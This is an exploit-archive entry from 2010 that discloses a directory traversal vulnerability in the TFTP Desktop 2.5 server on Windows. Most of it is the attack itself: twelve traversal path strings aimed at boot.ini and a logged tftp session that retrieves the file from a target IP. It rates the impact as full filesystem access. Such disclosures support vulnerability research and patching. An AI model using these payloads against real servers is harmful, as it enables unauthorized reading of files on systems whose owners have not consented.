TFTP Desktop 2.5 Directory Traversal Vulnerability

2010-09-01T00:00:00
ID 1337DAY-ID-13933
Type zdt
Reporter chr1x
Modified 2010-09-01T00:00:00

Description

Exploit for windows platform in category remote exploits

                                        
                                            ==================================================
TFTP Desktop 2.5 Directory Traversal Vulnerability
==================================================

Author: chr1x ([email protected])
Date: August 30, 2010
Affected operating system/software, including full version details
TFTP Desktop version 2.5, Tested on Windows XP PRO SP3
Download:
http://www.mynet2.com/soft/Software%20Archive/TFTP%20Server/tftp_desktop_free.exe
 
How the vulnerability can be reproduced
 
Attack strings below:
 
[*] Testing Path: .../.../.../boot.ini  <- Vulnerable string!!
[*] Testing Path: .../.../.../.../boot.ini  <- Vulnerable string!!
[*] Testing Path: .../.../.../.../.../boot.ini  <- Vulnerable string!!
[*] Testing Path: .../.../.../.../.../.../boot.ini  <- Vulnerable string!!
[*] Testing Path: .../.../.../.../.../.../.../boot.ini  <- Vulnerable string!!
[*] Testing Path: .../.../.../.../.../.../.../.../boot.ini  <- Vulnerable string!!
[*] Testing Path: ...\...\...\boot.ini  <- Vulnerable string!!
[*] Testing Path: ...\...\...\...\boot.ini  <- Vulnerable string!!
[*] Testing Path: ...\...\...\...\...\boot.ini  <- Vulnerable string!!
[*] Testing Path: ...\...\...\...\...\...\boot.ini  <- Vulnerable string!!
[*] Testing Path: ...\...\...\...\...\...\...\boot.ini  <- Vulnerable string!!
[*] Testing Path: ...\...\...\...\...\...\...\...\boot.ini  <- Vulnerable string!!
 
Confirmation log:
 
[email protected]:/# tftp
tftp> connect
(to) 192.168.1.53
tftp> ascii
tftp> get
(files) .../.../.../.../.../.../boot.ini
Received 211 bytes in 0.0 seconds
tftp> quit
 
What impact the vulnerability has on the vulnerable system
 
* High, since when exploiting the vulnerability the attacker is able to get full access to the victim filesystem.



#  0day.today [2018-04-03]  #